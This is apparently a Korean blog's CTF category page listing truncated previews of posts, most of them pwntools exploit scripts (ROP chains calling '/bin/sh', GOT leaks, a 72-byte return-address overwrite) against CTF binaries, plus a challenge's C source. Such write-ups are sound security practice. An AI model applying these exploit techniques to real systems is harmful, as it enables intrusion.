시스템 해킹/CTF (26)
ii4gsp

from pwn import * r = remote('bisc.lordofpwn.kr', 1473) e = ELF('./oldschool') libc = ELF('./libc32.so.6') read_plt = e.plt['read'] read_got = e.got['read'] puts_plt = e.plt['puts'] bss = e.bss() binsh = "/bin/sh\x00" pppr = 0x08048719 def exploit(addr, arg1, arg2, arg3): payload = '' payload += p32(addr) payload += p32(pppr) payload += p32(arg1) payload += p32(arg2) payload += p32(arg3) return ..
from pwn import * r = remote('1.209.148.228', 7677) e = ELF('./bomberman') def makeThread(): print r.sendlineafter('>', '1') def removeBomb(): print r.sendlineafter('>', '4') print r.sendlineafter('Length : ', '10') print r.sendlineafter('Color : ', 'rainbow') def showFlag(): print r.sendlineafter('>', '6') print r.recv() makeThread() makeThread() makeThread() makeThread() makeThread() makeThrea..

from pwn import * p = process('./ropasaurusrex') e = ELF('./ropasaurusrex') libc = e.libc pppr = 0x080484b6 payload = '' payload += '\x90' * (0x88 + 4) payload += p32(e.plt['write']) + p32(pppr) + p32(1) + p32(e.got['read']) + p32(4) payload += p32(e.plt['read']) + p32(pppr) + p32(0) + p32(e.bss()) + p32(8) payload += p32(e.plt['read']) + p32(pppr) + p32(0) + p32(e.got['read']) + p32(4) payload ..

#include #include #include #include #include #include #define BUFFSIZE 64 #define FLAGSIZE 64 bool win1 = false; bool win2 = false; void win_fn1(unsigned int arg_check) { if (arg_check == 0xDEADBEEF) { win1 = true; } } void win_fn2(unsigned int arg_check1, unsigned int arg_check2, unsigned int arg_check3) { if (win1 && \ arg_check1 == 0xBAADCAFE && \ arg_check2 == 0xCAFEBABE && \ arg_check3 == 0..

64bit 바이너리이다. main() 함수에서 vuln() 함수를 호출한다. vuln() 함수에서 gets() 함수로 v1에 입력을 받는다. gets()는 입력 길이를 검사하지 않으므로 버퍼보다 긴 입력은 sfp와 ret까지 덮어쓴다. v1은 rbp-0x40에 위치한다. v1 ~ sfp = 64, v1 ~ ret = 72. 72byte dummy를 주고 ret를 flag() 함수로 조작해주면 된다.
from pwn import * s = ssh(host = '2019shell1.picoctf.com', user = '', password = '') s.set_working_directory('/problems/newoverflow-1_4_3fc8f7e1553d8d36ded1be37c306f3a4') p = s.process('./vuln') e = ELF('/home/ii4gsp/picoCTF/vuln') flag..